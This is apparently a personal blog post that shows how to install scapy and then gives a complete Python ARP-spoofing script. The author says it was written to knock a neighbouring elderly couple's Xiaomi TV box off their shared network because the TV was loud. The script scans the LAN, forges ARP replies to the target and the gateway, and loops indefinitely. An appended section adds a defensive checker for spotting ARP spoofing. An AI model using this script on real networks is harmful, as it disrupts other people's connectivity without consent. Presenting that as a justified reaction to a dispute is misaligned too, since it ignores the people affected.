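Learning scapy (how to learn scapy)
I only recently learned about scapy and wish I had found it sooner. Its strength is that it can modify packets, and because it is based on Python it is convenient to use.
I only really started studying TCP/IP half a year ago. I am no expert: I spent about a month reading the FreeRTOS-TCP/IP source code and was still lost, but at least I came to understand much more of the TCP/IP protocol part.
I first came across Python a month ago and am slowly getting familiar with it.
Installing scapy on Ubuntu 14.04
My system already has Python 2.7 installed but not pip, so pip is installed first:
sudo apt-get install python-pip
If that fails, try the following:
sudo apt-get update --fix-missing
Once pip is installed, install scapy: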
sudo pip install scapy
scapy is now installed; it can be tested as follows:
```
vmuser@Linux-host:~/案頭$ python
Python 2.7.3 (default, Oct 26 2016, 21:04:23)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from scapy.all import *
>>> a = IP()
>>> a
<IP |>
>>> get_if_hwaddr("eth0")
'00:0c:29:70:b1:85'
>>>
```
eth0 is my network interface.
Python 3.6
pip install scapy
or:
pip3 install scapy-python3
ARP ATTACK EXAMPLE (1)
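Hardware platform: Dragon Board 410C
System: Debian
Python: 2.7
Living alone in a rented room, neighbours inevitably disturb one another. Recently a tenant has been watching TV at a considerable volume, and I happened to have a development board at hand, so I planned to use scapy to launch an ARP attack and knock the device offline.
A brief word on how an ARP attack works: it basically comes down to forging packets to pollute the ARP cache table of a host or of the gateway; a more elaborate version impersonates the gateway to mount a man-in-the-middle attack. Given my limited skill, I will keep it as simple as possible.
First I need to know what kind of device the other party has: use a LAN scanning tool to scan for active hosts, then use the MAC addresses to work out which one it is. The scan results were:
```
C8-3A-35-C0-05-15  Tenda Technology Co., Ltd.
04-E6-76-46-A6-F3  AMPAK Technology, Inc.
78-02-F8-34-4D-B5  私營
24-09-95-95-E2-02  HUAWEI TECHNOLOGIES CO.,LTD
20-47-47-BA-99-1E  Dell Inc.
70-14-A6-37-3F-0F  Apple, Inc.
E8-B4-C8-7B-F3-0F  Samsung Electronics Co.,Ltd
48-3B-38-D9-8D-D8  Apple, Inc.
```
Of these, "AMPAK" is the most suspicious; after some searching on Baidu I judged it to be a Xiaomi box. (As an aside: AMPAK has been caught doing IP scans many times...)
With the MAC pinned down, I reckon they (an elderly couple who watch TV all day, so noisy!!) cannot get away.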
```python
#!/usr/bin/env python
# _*_ coding=utf-8 _*_

from scapy.all import *
import time
import random
#-------------------------------------------------------
def GetSubNet(OurIP):
    '''
    Get the subnet prefix, e.g. 192.168.0
    '''
    Index = 0
    SubString = ""
    while True:
        num = OurIP.find('.',Index)
        if num != -1:
            Index = num + 1
        if num == -1:
            SubString = OurIP[:Index]
            break
    return SubString
#-------------------------------------------------------
def GetMac(tgtIP):
    '''
    Get the MAC address of the target IP.
    tgtIP: target IP address
    '''
    try:
        tgtMac = getmacbyip(tgtIP)
        return tgtMac
    except:
        print (tgtIP,"請檢查目標IP是否存活")
#-------------------------------------------------------
def GetBrocastIP(OurIP):
    '''
    Get the LAN broadcast address
    OurIP: our own IP address
    '''
    return GetSubNet(OurIP) + "255"
#-------------------------------------------------------
def GetForgetIP(OurIP,Num):
    '''
    Forge IP addresses
    OurIP: our own IP
    Num: how many IP addresses to forge
    '''
    SubString = GetSubNet(OurIP)
    # forge the IPs
    ForgetIP = []
    i = 0
    while i < Num:
        num = int(random.uniform(0,255))
        TempIP = SubString + "%d"%num
        if TempIP == OurIP:
            continue
        else:
            ForgetIP.append(TempIP)
        i = i + 1
    return ForgetIP
#-------------------------------------------------------
def GetForgeMac(OurMac,Num):
    '''
    Generate random MAC addresses
    OurMac: our own MAC address; must not collide with it
    '''
    ForgeMac = []
    j = 0
    while j < Num:
        while True:
            i = 0
            TempMac = ""
            while i < 6:
                num = int(random.uniform(0,255))
                TempMac = TempMac + "%02X"%num
                if i <= 4:TempMac = TempMac + ":"
                i = i + 1
            if TempMac == OurMac:
                pass
            else:
                ForgeMac.append(TempMac)
                j = j + 1
                break
    return ForgeMac
#-------------------------------------------------------
def AttackMac(Mac,face,Num,Interval,GW_IP):
    '''
    Attack a MAC
    Mac: the MAC address to attack
    face: network interface used to send the attack packets
    GW: whether to attack only the gateway
    '''
    Broadcast_mac = "FF:FF:FF:FF:FF:FF"
    GW_MAC = ""
    try:
        OurIP = get_if_addr(face)
        if GW_IP != "":GW_MAC = GetMac(GW_IP)
    except:
        OurIP = "192.168.0.105"
        return
    Broadcast_ip = GetBrocastIP(OurIP)
    while True:
        ForgeIP = GetForgetIP(OurIP,Num)
        # build the packet
        if GW_IP != "":
            # attack the gateway
            pkt = Ether(dst = GW_MAC,src = Mac)/\
                  ARP(psrc = ForgeIP,pdst = GW_IP,\
                  hwsrc = Mac,hwdst = GW_MAC,op = 2)
        else:
            # attack the whole network
            pkt = Ether(dst = Broadcast_mac,src = Mac)/\
                  ARP(psrc = ForgeIP,pdst = Broadcast_ip,\
                  hwsrc = Mac,op = 1)
        # send the packet
        try:
            #print(ls(pkt))
            #input()
            sendp(pkt,iface = face)
        except:
            print("!!Send Error!!")
            break
        time.sleep(float(Interval))
#-------------------------------------------------------
def AttackIP(tgtIP,face,Num,Interval,GW_IP):
    '''
    Attack an IP address
    tgtIP: target IP
    face: network interface
    Num: number of attack packets
    Interval: attack interval
    '''
    # broadcast address
    GW_MAC = ""
    Broadcast_mac = "FF:FF:FF:FF:FF:FF"
    # local addresses
    try:
        OurMac = get_if_hwaddr(face)
        OurIP = get_if_addr(face)
        if GW_IP != "":GW_MAC = GetMac(GW_IP)
    except:
        OurMac = "00:00:00:00:00:00"
        OurIP = "192.168.0.105"
    Broadcast_ip = GetBrocastIP(OurIP)
    while True:
        # prepare the packet
        ForgeMac = GetForgeMac(OurMac,Num)
        if GW_IP != "":
            # attack the gateway
            pkt = Ether(dst = GW_MAC,src = ForgeMac)/\
                  ARP(psrc = tgtIP,pdst = GW_IP,\
                  hwsrc = ForgeMac,hwdst = GW_MAC,op = 2)
        else:
            # attack the whole network
            pkt = Ether(dst = Broadcast_mac,src = ForgeMac)/\
                  ARP(psrc = tgtIP,pdst = Broadcast_ip,\
                  hwsrc = ForgeMac,op = 1)
        # send the packet
        try:
            sendp(pkt,iface = face)
        except:
            print("!!Send Error!!")
            break
        # delay
        time.sleep(float(Interval))
#-------------------------------------------------------
Table = {}
def Scanf(OurIP,Start,End):
    '''
    Scan the network, collect IP-MAC pairs and store them
    OurIP: our own IP address
    Start: first address to scan
    End: last address to scan
    Example: OurIP = 192.168.0.105, Start = 99, End = 150
    Scanned IP range: 192.168.0.99 ~ 192.168.0.150
    '''
    SubString = GetSubNet(OurIP)
    for num in range(Start,End):
        ip = SubString+str(num)
        arpPkt = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip, hwdst="ff:ff:ff:ff:ff:ff")
        res = srp1(arpPkt, timeout = 1, verbose=0)
        if res:
            Table[res.psrc] = res.hwsrc
    return Table
#-------------------------------------------------------
def GetIpByMac(Mac):
    if len(Table) == 0:return None
    return Table.get(Mac)

def Attack_xiaomi(Face,PackNum,Counter,Interval):
    '''
    Attack the Xiaomi box
    Face: network interface
    PackNum: number of packets
    Counter: number of attack rounds (-1: unlimited)
    Interval: attack interval
    Example: Face="wlan0",PackNum=10,Counter=-1,Interval=1
    '''
    MY_ip = get_if_addr(Face)
    MY_mac = get_if_hwaddr(Face)
    if MY_ip == None or MY_mac == None:return

    GW_ip = "192.168.0.1"
    GW_mac = GetMac(GW_ip)
    if GW_mac == None:return

    Scanf(MY_ip,99,150)

    XM_mac = "04:E6:76:46:A6:F3"
    XM_ip = GetIpByMac(XM_mac)
    if XM_ip == None:return

    while True:
        #Attack packs
        Temp_mac = GetForgeMac(MY_mac,PackNum)
        Temp_ip = GetForgetIP(MY_ip,PackNum)

        PKT_2_XM_4_mac = Ether(src = GW_mac,dst = XM_mac)/ARP(psrc = Temp_ip,pdst = XM_ip,op = 2)
        PKT_2_XM_4_ip = Ether(src = Temp_mac,dst = XM_mac)/ARP(psrc = GW_ip,pdst = XM_ip,op = 2)
        PKT_2_GW_4_XM_mac = Ether(src = XM_mac,dst = GW_mac)/ARP(psrc = Temp_ip,pdst = GW_ip,op = 2)
        PKT_2_GW_4_XM_ip = Ether(src = Temp_mac,dst = GW_mac)/ARP(psrc = XM_ip,pdst = GW_ip,op = 2)
        try:
            sendp(PKT_2_XM_4_mac,iface = Face)
            time.sleep(0.5)
            sendp(PKT_2_XM_4_ip,iface = Face)
            time.sleep(0.5)
            sendp(PKT_2_GW_4_XM_mac,iface = Face)
            time.sleep(0.5)
            sendp(PKT_2_GW_4_XM_ip,iface = Face)
        except:
            print("!!Send Error!!")
        #sleep
        num = int(random.uniform(0,Interval))
        time.sleep(num)
        if Counter == -1:
            pass
        else:
            Counter = Counter - 1
            if Counter == 0:
                return

if __name__ == "__main__":
    #while True:
        #AttackIP("192.168.0.108","wlan0",10,60,"192.168.0.1")
        #AttackMac(Mac,face,Num,Interval,GW_IP):
        #AttackMac("C8:3A:35:C0:05:15","wlan0",2,2,"192.168.0.108")
    while True:
        Attack_xiaomi("wlan0",20,30,5)
```
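How the forged ARP traffic described on this page looks to a monitor, as an added example that is not part of the original post: a pure-Python checker that flags the three traces such packets leave (Ethernet source differing from the ARP sender MAC, a non-gateway MAC claiming the gateway IP, and one MAC claiming many IPs). The addresses, the `detect_arp_anomalies` name and the sample frames are constructed for illustration; the tuple fields correspond to scapy's `Ether.src`, `ARP.op`, `ARP.hwsrc` and `ARP.psrc`.

```python
from collections import defaultdict

# Constructed sample values (documentation IP range, locally administered MACs).
GATEWAY_IP = "192.0.2.1"
GATEWAY_MAC = "02:00:00:00:00:01"
SENDER = "02:00:00:00:00:99"  # hypothetical spoofing host

# Each tuple mirrors the scapy fields used on this page:
# (Ether.src, ARP.op, ARP.hwsrc, ARP.psrc)
SAMPLE_FRAMES = [
    (GATEWAY_MAC, 2, GATEWAY_MAC, GATEWAY_IP),                   # genuine gateway reply
    ("02:00:00:00:00:10", 1, "02:00:00:00:00:10", "192.0.2.50"),  # genuine host request
    ("02:AA:BB:CC:DD:EE", 2, SENDER, GATEWAY_IP),                 # random Ether src, claims gateway IP
    (SENDER, 2, SENDER, "192.0.2.50"),                            # takes over an existing binding
    (SENDER, 2, SENDER, "192.0.2.77"),                            # same MAC, yet another IP
]

def normalise(mac):
    return mac.lower().replace("-", ":")

def detect_arp_anomalies(frames, pinned=None, max_ips_per_mac=2):
    """Return (frame index, reason) alerts for suspicious ARP frames."""
    pinned = dict((ip, normalise(m)) for ip, m in (pinned or {}).items())
    seen = {}                  # ip -> MAC first learned for it
    claims = defaultdict(set)  # MAC -> IPs it has claimed as sender
    alerts = []
    for i, (eth_src, op, hwsrc, psrc) in enumerate(frames):
        eth_src, hwsrc = normalise(eth_src), normalise(hwsrc)
        if eth_src != hwsrc:
            alerts.append((i, "eth-src/arp-hwsrc mismatch"))
        if psrc in pinned and hwsrc != pinned[psrc]:
            alerts.append((i, "pinned binding violated for " + psrc))
        elif psrc in seen and seen[psrc] != hwsrc:
            alerts.append((i, "binding changed for " + psrc))
        seen.setdefault(psrc, hwsrc)
        claims[hwsrc].add(psrc)
        if len(claims[hwsrc]) == max_ips_per_mac + 1:
            alerts.append((i, "mac claims many IPs: " + hwsrc))
    return alerts

if __name__ == "__main__":
    for alert in detect_arp_anomalies(SAMPLE_FRAMES, {GATEWAY_IP: GATEWAY_MAC}):
        print(alert)
```

On a real network the same bindings are protected by a static ARP entry for the gateway on the hosts or by Dynamic ARP Inspection on the switch.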